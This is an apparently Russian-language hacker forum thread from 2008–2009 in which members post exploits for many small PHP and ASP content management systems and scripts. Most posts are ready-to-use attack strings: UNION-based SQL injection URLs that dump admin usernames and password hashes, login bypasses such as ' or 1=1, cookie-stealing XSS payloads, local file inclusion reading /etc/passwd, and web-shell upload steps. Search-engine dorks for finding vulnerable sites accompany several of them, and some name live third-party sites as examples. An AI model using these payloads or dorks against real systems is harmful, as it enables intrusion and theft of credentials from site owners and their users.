http://localhost/[installdir]/viewcomments.php?phid=-1+union+select+1,concat_ws(0x3a,username,password) ,3,4,5,6+from+members/*

Admin panel:

http://localhost/[installdir]/admin/

Article Publisher Pro <= v1.5 SQL Injection

Author: ~!Dok_tOR!~
Date found: 30.08.08
Product: Article Publisher Pro v1.5
Price: $75
URL: www.phparticlescript.com
Vulnerability Class: SQL Injection

Exploit 1:

http://localhost/[installdir]/articles.php?art_id=1+union+select+1,2,concat_ws(0 x3a,aut_username,aut_password),4,5,6,7+from+flaxwe b_authors+where+aut_id=1/*

Exploit 2:

http://localhost/[installdir]/userarticles.php?aut_id=-1+union+select+1,concat_ws(0x3a,aut_username,aut_p assword),3,4,5,6,7,8,9,10,11+from+flaxweb_authors+ where+aut_id=1/*

Dork:

All rights reserverd © Your Articles Pro 2002-2005
Copyright 2006 - 2008, Article Publisher PRO v1.5

Keepsakes SQL Injection

Author: ~!Dok_tOR!~
Date found: 28.08.08
Product: Keepsakes
Price: $25
URL: harlandscripts.com
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off

Exploit 1:

http://localhost/[installdir]/details.php?user=-1'+union+select+concat_ws(0x3a,username,password), 2,3,4,5,6,7,8,9,10,11,12+from+admin_sign/*

Opera -> Source(Ctrl+F3)

Exploit 2:

http://localhost/[installdir]/details.php?user=-1'+union+select+concat_ws(0x3a,username,password), 2,3,4,5,6,7,8,9,10,11,12+from+members/*

Opera -> Source(Ctrl+F3)

Exploit 3:

http://localhost/[installdir]/details.php?user=-1'+union+select+concat_ws(0x3a,username,password), 2,3,4,5,6,7,8,9,10,11,12+from+affiiiates/*

Opera -> Source(Ctrl+F3)

Exploit 4:

http://localhost/[installdir]/showtime.php?pid=-1'+union+select+1,2,3,user(),5,6,concat_ws(0x3a,us ername,password),8,9,10,11,12,13,14,15,16,version( ),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40+from+admin_sign/*

Exploit 5:

http://localhost/[installdir]/showtime_noborder.php?pid=-1'+union+select+1,2,3,user(),5,6,concat_ws(0x3a,us ername,password),8,9,10,11,12,13,14,15,16,version( ),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40+from+admin_sign/*

Admin panel:

http://localhost/[installdir]/admin/

Dork:

Copyright Your Keepsakes ® ™ 2007

Smart Traffic 6 in 1 SQL Injection

Author: ~!Dok_tOR!~
Date found: 30.08.08
Product: Smart Traffic 6 in 1
Download script: _http://rapidshare.com/files/139785932/smarttraffic.rar
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off

Exploit:

http://localhost/[installdir]/inc.groups.php?pid=-1%27+union+select+1,2,concat_ws(0x3a,login,pswd,em ail)+from+members/*

TopCoolive SQL Injection

Author: ~!Dok_tOR!~
Date found: 30.08.08
Product: TopCoolive
URL: www.vetton.ru
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off

Exploit 1:

http://localhost/[installdir]/stats.php?id='+union+select+1,user(),password,4,5, version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34+from+new/*

Exploit 2:

http://localhost/[installdir]/stat_res.php?id='+union+select+1,2,password,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34+from+new/*

Exploit 3:

http://localhost/[installdir]/img.php?id='+union+select+1,2,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,password,30,31,32,33,34+from+new/*

Warez Script (by Mikel Dean) SQL Injection

Author: ~!Dok_tOR!~
Date found: 27.08.08
Product: Warez Script
Download script: _http://rapidshare.com/files/98446563/Warez_Script_English_by_Mikel_Dean.rar
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off

Exploit 1:

http://localhost/[installdir]/v2/index.php?section=download&id='+union+select+1,2,3,4,concat_ws(0x3a,username, password)+from+ddl_users/*

Exploit 2:

http://localhost/[installdir]/v2/index.php?section=list&subcat='+union+select+1,2,3,concat_ws(0x3a,usernam e,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22+from+ddl_users/*

http://localhost/[installdir]/v2/index.php?section=post_upload&cat='+union+select+1,2,3,4/*

Admin Authentication Bypass

http://localhost/[installdir]/v2/login.php

User: 1' or 1=1/*
Pass: 1' or 1=1/*

(c) ~!Dok_tOR!~

Ded MustD!e

19.09.2008, 14:19

На милворме был выложен эксплоит к E-Php CMS (http://milw0rm.com/exploits/6483) от разработчика www.ephpscripts.com, я решил проверить на наличие уязвимостей остальные их проекты (названия таблицы и колонок не были указаны, они одинаковые на всех скриптах).

E-Php B2B Trading Marketplace Script (listings.php cid) Remote SQL Injection Vulnerability

Exploit: http://www.site.com/listings.php?browse=sell&cid=-1+union+select+1,concat(es_admin_name,0x3a,es_pwd) ,3,4,5,6,7,8+from+ephpb2b_admin/*

Example:
http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(es_admin_name,0x3a,es_pwd) ,3,4,5,6,7,8+from+ephpb2b_admin/*

E-Php Shop Script (search_results.php cid) Remote SQL Injection Vulnerability

Exploit:
http://www.site.com/search_results.php?cid=-1+union+select+concat(es_admin_name,0x3a,es_pwd),2 +from+ephpb2b_admin/*

Example:
http://www.ephpscripts.com/demo/yng_wineshop/search_results.php?cid=-1+union+select+concat(es_admin_name,0x3a,es_pwd),2 +from+ephpscri_b2badeel.ephpb2b_admin/*

balt

08.11.2008, 16:32

Fundlink
SQL:

site.com/showcategory.php?id=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/users

PHP-Newsletter
SQL:
site/index.php?pgid=4&cat_id=-99999/**/union/**/select/**/1,1,1,concat(email,0x7c,username,0x7c,password),0x 3a,1,1,1,1,1/**/from/**/users/*where%20admin1,1

Com Endeavors
SQL:
site.com/index.php?go=detail&id=-99999/**/union/**/select/**/0,0,0,0,0,0,0,0,0,0,0x7c,email,0x3a,
concat(username,0x3a,password),1,1,1,1,1,1,2,2,2,2 ,2
/**/from/**/admin/*where,limit,2--

niccell
SQL:
site.com/list.php?pagenum=S@BUN&categoryid=9999+union+select+111,222,
concat(login,0x3a,password),444+from+admin_login/*

KwsPHP
SQL:
site.com/index.php?mod=galerie&action=gal&id_gal=-99999/**/union/**/select/**/0,1,concat(pseudo,0x3a,pass),concat(pseudo,0x3a,pa ss),4,5,6,7/**/from/**/users/*

Esy
SQL:
site.com/sections.php?op=viewarticle&artid=-9999999/**/union/**/select/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*
site.com/ sections.php?op=printpage&artid=-9999999/**
/union/**/select/**/aid,pwd/**/from/**/nuke_authors/*

BosClassifieds Classified Ads System
SQL:
site.com/bosclassifieds/index.php?cat=[SQL]

pollBooth

SQL:
site.com/pollBooth.php?op=results&pollID=-1+union+select+password,1,2,3+from+users

RS MAXSOFT
SQL:
site.com/modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login,0x3a,pass)+from+admin

SSWD
SQL:
site.com/index.php?go=subcat&id=-999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6/**/from/**/admin/*

OpenLD
SQL:
site.com/index.php?id=999/**/UNION/**/SELECT/**/ALL/**/null,null,null,null,null,value,null,null,null,null ,null,null,null,null/**/FROM/**/settings--

Site Sift
SQL:
site.com/ndex.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16/**/from/**/admin/*

site.com/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,
10,11,12,13,14,15,16,17,18,19,20/**/from/**/admin/*

Showlink
SQL:
site.com/index.php?showlink=ulus&fid=ulus8&p=links&area=1&categ=-1+union+select+0,concat(email,0x3a,pass),2+from+kp ro_user

eSyndiCat
SQL:
site.com/news.php?id=-1%27%20union%20select%201,username,password,4,5%20 from%20dir_admins/*

Bwired

SQL: i
site.com/ndex.php?newsID=-99%20union%20all%20select 1, 2,concat(user_login,0x20,0x3a,0x20,user_passwd),4, 5, 6, 7, 8, 9, 10, 11%20from%20authuser

Md-Pro
SQL:
site.com/index.php?module=Topics&func=
view&topicid=-1 UNION ALL SELECT null,null,concat
(pn_uname,0x3a,pn_pass),null,null, null,null from md_users where pn_uid=2/*

eMeeting Online Dating Software
SQL:
site.com/b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/*
site.com/b.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6,7,8,9,10/**/from/**/members/**/where/**/username=0x61646D696E/*

FlashGameScript
SQL:
site.com/index.php?func=member&user='+union+select+0,0,0,0, 0,0,0,0,0,0,username,password,0,0,0,0,0,user_type+
from+members+where+user_type=2/*
site.com/index.php?func=member&user='+union+select+0,0,0,0,
0,0,0,0,0,0,username,password,0,0,0,0,user_type+fr
om+members+where+user_type=2/*

Dimi4

13.11.2008, 23:48

Author: Dimi4
Date found: 30.10.08
Product: Image Hosting System v1.3.4
Price: n\q
URL: www.webmastersadvantage.com (http://www.1phpscripts.com/Image_Hosting_System_Script.html)
Vulnerability Class: XSS
Vulnerability Script:viewimage.php

<?
$file = $_GET['file'];
if ($file == "") {
header("Location: " . $server_url);
exit;
}
.....

<img src="<?= $file ?>

http://127.0.0.1/ImageHostingSystem/viewimage.php?file=%22%3E%3Cscript%3Ealert()%3C/script%3E

Мда.. понял всё это зря... Открыта Админка ;)
Default path:/imageadmin/

http://www.photosharingworld.com/imageadmin/

iddqd

18.11.2008, 22:08

CMS Made Simple 1.4.1, возможно более старые версии.

Активная XSS в админке.
Уязвимый параметр: название новой категории при ее добавлении в Content -> News -> Categories (также уязвимы имена Field Definitions).

Чтобы "заставить" админа внедрить в название наш код, необходимо провести CSRF-атаку. Данные передаются через POST, но можно передать и GET'ом.

Формируем ссылку:
http://путь_до_каталога_CMS/admin/moduleinterface.php?mact=News,m1_,addcategory,0&m1_name=[XSS]
Лучше подгружать во фрейме. :rolleyes:

XSS будет доступна на странице:
http://путь_до_каталога_CMS/admin/moduleinterface.php?module=News

(с) iddqd

Через жопу конечно, но все равно ;)

Smapt

21.11.2008, 02:59

StrawBerry 1.1.1 (бывший CuteNews)

Инклюд для версии с TXT базами:
http://localhost/example/index.php?do=../../../../db/base/users.MYD%00

Инклюд по такому принципу присутствует во всех ТХТ версиях StrawBerry и CuteNews

Заливка шела:
Админка->Настройки->Управление картинками
переименовываем шелл в .jpg и заливаем на серв.
Жмём "переименовать", меняем разрешение обратно на пхп, получаем шел. Для StrawBerry 1.1.1, т.к. доступ к папке аплоад запрежён переименовываем в "../../shell.php" получаем _ttp://localhost/shell.php

Ded MustD!e

01.12.2008, 03:45

Active Business Directory v 2 (Auth Bypass) SQL Injection Vulnerability

script: Active Business Directory v 2
found: Ded MustD!e

exploit: http://www.activewebsoftwares.com/demoactivebusinessdirectory/account.asp

E-mail Address: ' or ' 1=1
Password: ' or ' 1=1

ASPReferral v 5.3 (Auth Bypass) SQL Injection Vulnerability

script: ASPReferral v 5.3
found: Ded MustD!e

exploit: http://www.activewebsoftwares.com/demoaspreferral/Merchant.asp

E-mail Address: ' or ' 1=1--
Password: ' or ' 1=1--

Qwazar

07.12.2008, 06:16

ExpressionEngine Core v. 1.6.6 и другие версии и модификации вроде бы тоже (пишут, что за бугром популярен)

Алгоритм хеширования: sha1(pass) - по дефолту, или md5(pass).

XSS (Кстати, этим скриптом можно отправить кому угодно письмо с уязвимого сервера, с обратным адресом владельца блога):
POST: http://test1.ru/system/utilities/email_test.php
recipient=1"><script>alert(/XSS1/)</script>&subject=2"><script>alert(/XSS2/)</script>&message=3"></textarea><script>alert(/XSS3/)</script>

При неудалённом install.php:
LFI:http://test1.ru/install.php?page=4
system_dir=system&ext=/../../1.php
//Если system_dir не system (по дефолту), то следует изменить на актуальный.
LFI:http://test1.ru/install.php?page=5
ext=/../../1.php
LFI:http://test1.ru/install.php?page=6
ext=/../../1.phpLFI:http://test1.ru/install.php?page=7
rebuild_config=1&ext=/../../1.php

Раскрытие путей :
http://test1.ru/system/utilities/admin.php
http://test1.ru/system/utilities/dbtest.phpРаскрытие путей (при register_globals=ON):http://test1.ru/system/update.php?conf=1
Раскрытие информации о пользователях, префикса таблиц БД, ip адресов юзеров(да и не только):

Папки не спрятаны .htaccess'ом, в диком интернете в db_cache можно найти интересную информацию:
/system/cache/sql_cache/
/system/cache/db_cache/
/system/cache/magpie_cache/
/system/cache/page_cache/
/system/cache/tag_cache/
Например: http://concerningdesign.org/system/cache/db_cache/6a992d5529f459a44fee58c733255e86/6c6237982ae04c3a69cea9d2ca9a6a3e (информация о пользователях логин, мыло и т.п.)

dork: "powered by ExpressionEngine" (кстати, действительно, довольно много)

baltazar

07.12.2008, 17:56

скину сюда,потому что я ослеп,и не вижу тему "Уязвимости бесплатных ЦМС"

SQL Inj:

site.com/news.php?id=-1%27%20union%20select%201,username,password,4,5%20 from%20dir_admins/*

XSS:

В поиск:
"><script>alert()</script>

0nep@t0p

07.12.2008, 22:44

CMS: [ ACMS™ ]

Developer: [ http://www.acalog.com/ ]

Dork: [ Powered by the acalog™ academic catalog management system (ACMS™) inurl:"?coid=" ]

Bug type: [ Blind Sql Injection ]

Bug: [ coid=63+and+ascii(lower(substring((version()),1,1) ))=52/* ]

Example: [ http://catalog.sdstate.edu/preview_course.php?catoid=2&coid=63+and+ascii(lower(substring((version()),1,1) ))=52/* ]

Примечательно, что большинство сайтов с бажной цмс находятся в доменной зоне .edu

Dimi4

12.12.2008, 00:55

[Уязвимости FAQMasterFlex]
Условие: magic_quotes_gpc = OFF
1.
File:faq.php
Уязвимый кусок кода:

$result = mysql_query("SELECT * FROM faqs WHERE category_id = '$category_id'") or die(mysql_error());

SQL иньекция:

http://path/FAQMasterFlex/faq.php?answer=2&cat_name=FAQMasterFlex%20Usage&category_id=1'+union+select+1,2,concat_ws(0x3a,dat abase(),version(),user()),4/*

2.
File:faq_admin.php
Уязвимый кусок кода:

$result = mysql_query("SELECT * FROM faqs WHERE category_id = '$category'") or die(mysql_error());
SQL иньекция:

http://path/FAQMasterFlex/faq_admin.php?category='+union+select+1,2,concat_w s(0x3a,database(),version(),user()),4/*&cat_name=

Google dork:"Powered by Lethal Penguin."

http://www.lethalpenguin.net/design/faqmasterflex.php?download=true

iddqd

14.12.2008, 19:18

Textpattern v.4.0.3

Passive XSS
http://localhost/textpattern/index.php?event=tag&name=image&id=1&ext=</textarea><script>alert(document.cookie)</script>&alt=&h=1&w=400&type=textile

http://localhost/textpattern/index.php?event=log&step=list&page=1<script>alert(document.cookie)</script>

Active XSS
Написать новую статью => http://localhost/textpattern/index.php?event=article => в заголовок вставляем код <script>alert()</script> или </title><script>alert()</script>

Категории => уязвимо поле "Название".

Файлы => поле "Описание".

Ссылки => поля "Заголовок" и "Описание".

(c) iddqd

Qwazar

19.12.2008, 19:50

MODx 0.9.6.2

Passive XSS
/assets/modules/docmanager/includes/tv.ajax.php
POST: tplID=-1&langNoTV=<body onLoad=alert('ok')>/assets/plugins/tinymce3101/tinymce.linklist.php?list=<script>alert(/XSS/)</script>
register_globals ON/assets/snippets/ditto/extenders/request.extender.inc.php?dbg=1&stripTags=0&ditto_<script>alert(/XSS/)</script>
register_globals ON
В этом случае забавно то, что XSS в имени параметра, а вот значение фильтруется жёстко.

Раскрытия путейassets/cache/siteCache.idx.php

manager/includes/rss.inc.php
manager/includes/browsercheck.inc.php
manager/includes/sniff/phpSniff.class.php
manager/includes/extenders/getUserData.extender.php

assets/snippets/ditto/formats/xml.format.inc.php
assets/snippets/ditto/formats/rss.format.inc.php
assets/snippets/ditto/formats/json.format.inc.php
assets/snippets/ditto/classes/debug.class.inc.php
assets/snippets/ditto/formats/atom.format.inc.php
assets/snippets/ditto/extenders/tagging.extender.inc.php

manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php

assets/plugins/tinymce3101/jscripts/tiny_mce/plugins/spellchecker/classes/PSpell.php
assets/plugins/tinymce3101/jscripts/tiny_mce/plugins/spellchecker/classes/GoogleSpell.php
assets/plugins/tinymce3101/jscripts/tiny_mce/plugins/spellchecker/classes/EnchantSpell.php
assets/plugins/tinymce3101/jscripts/tiny_mce/plugins/spellchecker/classes/PSpellShell.php

baltazar

20.12.2008, 16:26

bbpress v1.0

File: realplay.php

Уязвимый кусок кода:

<?php
echo (get_magic_quotes_gpc() ? stripslashes($_GET['link']) : $_GET['link']);
?>

XSS иньекция:

http:/path/inc/realplay.php?link=%3Cscript%3Ealert(document.cooki e)%3C/script%3E

Активная XSS:

В /inc/realplay.php поле email вводим:

<script>alert()</script>

baltazar

20.12.2008, 22:30

WorkingOnWeb

File: admin.inc.php

Уязвимый кусок кода:

$user = "";
$pass = "";
if (isset($_POST['loginname']) && $_POST['loginname'] != "")
$user = $_POST['loginname'];
if (isset($_POST['loginpass']) && $_POST['loginpass'] != "")
$pass = $_POST['loginpass'];
$loggedin = $this->loginuser($user, $pass);

SQL Иньекция:
http://path/articles/rss.php?category=-1/**/union/**/select/**/1,2,login,password/**/from/**/users/*

XSS иньекция:

http://path/wow/index.php/"><script>alert(document.cookie)</script>

baltazar

21.12.2008, 21:22

iGaming CMS

Файл: lang.php
Уязвимый код:
if(isset($_GET['lang']))

$include_lang = $_GET['lang'];
}
elseif(file_exists(TOP_DIR.'/sql/db_connect.php'))
{
include_once(TOP_DIR.'/functions/db_api.php');
$include_lang = get_language();
}
else
{
$include_lang = get_http_accept_lang();
}
include_once(TOP_DIR.'/lang/lang.'.$include_lang.'.php');

http://path/docs/index.php?lang=/../../../../../../../../../../test

Если magic_quotes_gpc = Off,тогда:

http://path/docs/index.php?lang=/../../../../../../../../../../etc/passwd%00

Файл: install.php

Уязвимый код:
switch($_GET['whatlang'])
{
case 1:
include_once(TOP_DIR.'/lang/lang.'.@$_GET['language'].'.php');
break;

default:
include_once(TOP_DIR.'/lang/lang.English.php');
break;
}

http://path/install.php?whatlang=1&language=/../../../../../../../test

Если magic_quotes_gpc = Off,то:

http://path/install.php?whatlang=1&language=/../../../../../../../etc/passwd%00

SQL иньекция:

http://path/index.php?sideid=28+union+select+concat(username,0 x3a,password),2,3+from+login/*

XSS иньекция:
http://path/search/?q=%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fs cript%3E

baltazar

22.12.2008, 17:08

Wheatblog

Файл: main.php
Кусок уязвимого кода:
$config = ereg_replace(":","", $config);

$config = trim(ereg_replace("../","", $config));

$config = trim(ereg_replace("/","", $config));

if (($config=="")|| (!eregi(".inc.php",$config))){$config="config.inc.php"; echo "\n";}

http://path/main.php?config=eregi.inc.php\\..\\admin\\.htacces s

Если magic_quotes_gpc =ON,то:
http://path/main.php?config=eregi.inc.php\..\admin\.htaccess

XSS иньекция:

http://path/index.php?action=category&id=<script>alert(document.cookie)</script>

l1ght

23.12.2008, 19:22

&
p.w.p. author (http://mangos.ru/showthread.php?t=15643) & author (http://mangos.ru/showthread.php?t=15658)

charname_change.php:
...
$guid = addslashes($_GET["guid"]);
...
$sql = "SELECT guid, account, CAST(SUBSTRING_INDEX(SUBSTRING_INDEX(`data`, ' ', 1462), ' ', -1) AS UNSIGNED) AS `money`, name FROM characters WHERE guid=$guid AND account=$id";
...
mod spora author (http://mangos.ru/showthread.php?t=12224)

guild.php:
...
$_GET['page'] = !isset($_GET['page'])?'guilds':$_GET['page'];
...
include("./module/".$_GET['page'].".php");
...

wow-ultimate author (http://mangos.ru/showthread.php?t=11656)

gilds.php:
...
if (@$_GET['guid']) {
$guildid = addslashes($_GET['guid']);
...
$query_leader_name = $characters_db->query("SELECT * FROM `characters` WHERE `guid` IN (SELECT `guid` FROM `guild_member` WHERE `guildid`=".$guildid.") ORDER by `name`");
...

block-center.php:
<?php
if (!$menu = &$_GET['page'])
$menu=$main_page;
print "<table align=\"center\" valign=\"top\" cellSpacing=\"0\" cellPadding=\"0\" width=\"100%\" border=\"0\" ><tr>
<td width=\"100%\" valign=\"top\" align=\"center\" >";
require_once("modules/$menu.php");
print "</td></tr></table>";
?>
MiniManager author (http://mangos.ru/showthread.php?t=4820)
дофига скулей ;) , cвн (https://mmfpm.svn.sourceforge.net/svnroot/mmfpm/trunk/)

l1ght

28.12.2008, 20:04

FGS_Studio cms
sql inj в параметре content_id
например на сайте производителя:
http://fgs.kiev.ua/index.php?lang_id=1&menu_id=1&&content_id=-1+union+select+1,2,3,4,5,6,7,concat(user,0x3c,user pass),9,10,11,load_file(0x3a)+from+user--+
исходники найти не удалось - колонки угадывались методом научного тыка).
dork:
inurl:lang_id= inurl:menu_id=

baltazar

08.01.2009, 02:23

FuzzyLime CMS

SQL Иньекция:

http://site/shop_showcat.php?='%20UNION%20ALL%20SELECT%201,2,3 ,4,5,6,concat(username,':',passwrd)%20from%20users/*

Локальный Инклуд:
Файл:index.php :
Уязвимый кусок кода:
<?php readfile($Root.$Path); ?> <---[xxx]
<form action="application_loader.php" method="post">

http://site/index.php?Root=../../../../../../etc/password
http://index.php?Path=../../../../../../etc/password

XSS:
http://site/login.php?url=%22%3E%3Cscript%3Ealert(document.coo kie)%3C/script%3E

baltazar

08.01.2009, 20:39

yBlog

Локальный Инклуд:

Файл: pc.lib.php
Кусок уязвимого кода:

if (!isset($g_pc_lib_dir))
$g_pc_lib_dir = "lib";

...

$g_pc_extension = "php";

if (!defined("PCLERROR_LIB"))
{
include("data/inc/$g_pc_lib_dir/pclerror.lib.$g_pcltar_extension");
}
if (!defined("PCLTRACE_LIB"))
{
include("data/inc/$g_pc_lib_dir/pcltrace.lib.$g_pcltar_extension");

http://site/inc/lib/pc.lib.php?g_pc_lib_dir=../../../../../../../../../../../../../etc/passwd%00

SQL Иньекция:
http://site/search_results.php?cid=-1/**/union/**/select/**/1,version(),3,4,5,6--

XSS Иньекция:
http://site/yblog/user.php?n=<script>alert(/xss/)</script>

l1ght

14.01.2009, 15:38

webspell cms 4.01.02 dev (http://cms.webspell.org/index.php?site=files&cat=12)

articles.php:

...
$title = $_POST['title'];
$message = $_POST['message'];
$link1 = $_POST['link1'];
$url1 = $_POST['url1'];
$window1 = $_POST['window1'];
$link2 = $_POST['link2'];
$url2 = $_POST['url2'];
$window2 = $_POST['window2'];
$link3 = $_POST['link3'];
$url3 = $_POST['url3'];
$window3 = $_POST['window3'];
$link4 = $_POST['link4'];
$url4 = $_POST['url4'];
$window4 = $_POST['window4'];
$comments = $_POST['comments'];
$articlesID = $_POST['articlesID'];

safe_query("UPDATE ".PREFIX."articles SET
title='".mysql_escape_string($title)."',
content='".mysql_escape_string($message)."',
link1='".mysql_escape_string($link1)."',
url1='".mysql_escape_string($url1)."',
window1='".mysql_escape_string($window1)."',
link2='".mysql_escape_string($link2)."',
url2='".mysql_escape_string($url2)."',
window2='".mysql_escape_string($window2)."',
link3='".mysql_escape_string($link3)."',
url3='".mysql_escape_string($url3)."',
window3='".mysql_escape_string($window3)."',
link4='".mysql_escape_string($link4)."',
url4='".mysql_escape_string($url4)."',
window4='".mysql_escape_string($window4)."',
saved='1', comments='$comments' WHERE articlesID='$articlesID'");

whoisonline.php:
$sort = $_GET['sort'];
$type = $_GET['type'];
...
$ergebnis = safe_query("SELECT * FROM ".PREFIX."whoisonline ORDER BY $sort $type");

dork:
inurl:site=whoisonline inurl:desc

шелл заливается либо через squads:
http://img133.imageshack.us/img133/8657/shellva3.jpg
либо через шаблоны

Twoster

19.01.2009, 06:29

Создал эту тему, дабы не плодить кучу тем с найдеными мной (либо не мой) уязвимостями в недоCMS и прочих интересных продуктах! =)

Сайт производитель: http://wdt.org.ru
Продукт: DPortal
Версия: 1.1
(wap-CMS)

Локальное чтение файлов:
http://site.ru/file/opis.php?ver=html&login=Twoster&pas=&katal=Upgrades&file=../../uzer/Admin%00
XSS (Повсюду):

http://site.ru/file/obzor.php?ver=html&pas="><script>alert()</script>&katal=Upgrades
http://site.ru/file/obzor.php?ver=html"><script>alert()</script>&pas=&katal=Upgrades
http://site.ru/file/obzor.php?ver=html&pas=&katal=Upgrades"><script>alert()</script>
http://site.ru/file/opis.php?ver=html&login=Twoster&pas=&katal=Upgrades&file=Upgrade1.zip"><script>alert()</script>
http://site.ru/gbyk/say.php?ver=html&pas=&login=&obr=-Twost"><script>alert()</script>

Сайт производитель: http://steadycms.ru/
Продукт: Steady-CmS
Версия: 5.5
(wap-CMS)

SQL-inj

По всему скрипту не фильтруется User-agent.
Примерный эксплойт:
Opera/9.51 (Windows NT 5.1; U; ru)',sex='m

Сайт производитель: http://linkorcms.ru/
Продукт: LinkorCMS
Версия: 1.2

XSS
1. http://cms.ru/index.php?name=search&op=search
Уязвимо поле поиска : searchstr

2. http://cms.ru/index.php?name=user&op=registration
2.1 Ваше имя на сайте - переменная nikname
2.2 Настоящее имя(Ф.И.О.) - переменная realname
2.3 Сайт - переменная homepage
2.4 Город - переменная city

Сайт производитель: www.phpmyadmin.net/
Продукт: phpMyAdmin 2.6.1
Версия: 2.6.1

Расскрытие путей
http://localhost/Tools/phpMyAdmin/tbl_properties.php?lang[]=ru-win1251
http://localhost/Tools/phpMyAdmin/tbl_properties.php?server[]=1
http://localhost/Tools/phpMyAdmin/tbl_properties.php?collation_connection[]=cp1251_general_ci
http://localhost/Tools/phpMyAdmin/tbl_properties.php?db[]=aaa&table=aaa
http://localhost/Tools/phpMyAdmin/sql.php?sql_query[]=
http://localhost/Tools/phpMyAdmin/server_export.php?convcharset[]=iso-8859-1

Артем Солнце

20.01.2009, 13:53

Обзор уязвимостей OpenX 2.6.3
Раскрытие путей:
/openx/www/api/v1/common/BaseAdvertiserService.php
/openx/www/api/v1/common/BaseAgencyService.php
/openx/www/api/v1/common/BaseBannerService.php
/openx/www/api/v1/common/BaseCampaignService.php
/openx/www/api/v1/common/BaseLogonService.php
/openx/www/api/v1/common/BasePublisherService.php
/openx/www/api/v1/common/BaseServiceImpl.php
/openx/www/api/v1/common/BaseUserService.php
/openx/www/api/v1/common/BaseZoneService.php
/openx/www/api/v1/common/XmlRpcUtils.php
/openx/www/api/v1/xmlrpc/AdvertiserServiceImpl.php
/openx/www/api/v1/xmlrpc/AgencyServiceImpl.php
/openx/www/api/v1/xmlrpc/BannerServiceImpl.php
/openx/www/api/v1/xmlrpc/CampaignServiceImpl.php
/openx/www/api/v1/xmlrpc/LogonServiceImpl.php
/openx/www/api/v1/xmlrpc/PublisherServiceImpl.php
/openx/www/api/v1/xmlrpc/UserServiceImpl.php
/openx/www/api/v1/xmlrpc/ZoneServiceImpl.php
/openx/www/admin/config.php
/openx/plugins/3rdPartyServers/3rdPartyServers.php
/openx/plugins/3rdPartyServers/adtech/adtech.plugin.php
/openx/plugins/3rdPartyServers/atlas/atlas.plugin.php
/openx/plugins/3rdPartyServers/bluestreak/bluestreak.plugin.php
/openx/plugins/3rdPartyServers/cpx/cpx.plugin.php
/openx/plugins/3rdPartyServers/doubleclick/doubleclick.plugin.php
/openx/plugins/3rdPartyServers/eyeblaster/eyeblaster.plugin.php
/openx/plugins/3rdPartyServers/falk/falk.plugin.php
/openx/plugins/3rdPartyServers/google/google.plugin.php
/openx/plugins/3rdPartyServers/kontera/kontera.plugin.php
/openx/plugins/3rdPartyServers/max/max.plugin.php
/openx/plugins/3rdPartyServers/mediaplex/mediaplex.plugin.php
/openx/plugins/3rdPartyServers/tangozebra/tangozebra.plugin.php
/openx/plugins/3rdPartyServers/tradedoubler/tradedoubler.plugin.php
/openx/plugins/3rdPartyServers/ypn/ypn.plugin.php
/openx/plugins/Maintenance/Maintenance.php
/openx/plugins/authentication/Authentication.php
/openx/plugins/authentication/cas/cas.plugin.php
/openx/plugins/authentication/cas/OaCasClient.php
/openx/plugins/authentication/cas/Controller/ConfirmAccount.php
/openx/plugins/authentication/cas/Central/RpcMapper.php
/openx/plugins/authentication/cas/Central/Cas.php
/openx/plugins/authentication/cas/CAS/PGTStorage/pgt-db.php
/openx/plugins/authentication/cas/CAS/PGTStorage/pgt-file.php
/openx/plugins/authentication/cas/CAS/languages/english.php
/openx/plugins/authentication/cas/CAS/languages/french.php
/openx/plugins/authentication/cas/CAS/languages/german.php
/openx/plugins/authentication/cas/CAS/languages/greek.php
/openx/plugins/authentication/cas/CAS/languages/japanese.php
/openx/plugins/authentication/internal/internal.plugin.php
/openx/plugins/channelDerivation/ChannelDerivation.php
/openx/plugins/channelDerivation/mysql/mysql.plugin.php
/openx/plugins/channelDerivation/xmlrpc/xmlrpc.plugin.php
/openx/plugins/deliveryLimitations/Client/Browser.delivery.php
/openx/plugins/deliveryLimitations/Client/Browser.plugin.php
/openx/plugins/deliveryLimitations/Client/Domain.delivery.php
/openx/plugins/deliveryLimitations/Client/Domain.plugin.php
/openx/plugins/deliveryLimitations/Client/Ip.delivery.php
/openx/plugins/deliveryLimitations/Client/Ip.plugin.php
/openx/plugins/deliveryLimitations/Client/Language.delivery.php
/openx/plugins/deliveryLimitations/Client/Language.plugin.php
/openx/plugins/deliveryLimitations/Client/Os.delivery.php
/openx/plugins/deliveryLimitations/Client/Os.plugin.php
/openx/plugins/deliveryLimitations/Client/Useragent.delivery.php
/openx/plugins/deliveryLimitations/Client/Useragent.plugin.php
/openx/plugins/deliveryLimitations/DeliveryLimitations.php
/openx/plugins/deliveryLimitations/DeliveryLimitationsArrayData.php
/openx/plugins/deliveryLimitations/DeliveryLimitationsCommaSeparatedData.php
/openx/plugins/deliveryLimitations/DeliveryLimitationsResourceData.php
/openx/plugins/deliveryLimitations/Geo/Areacode.delivery.php
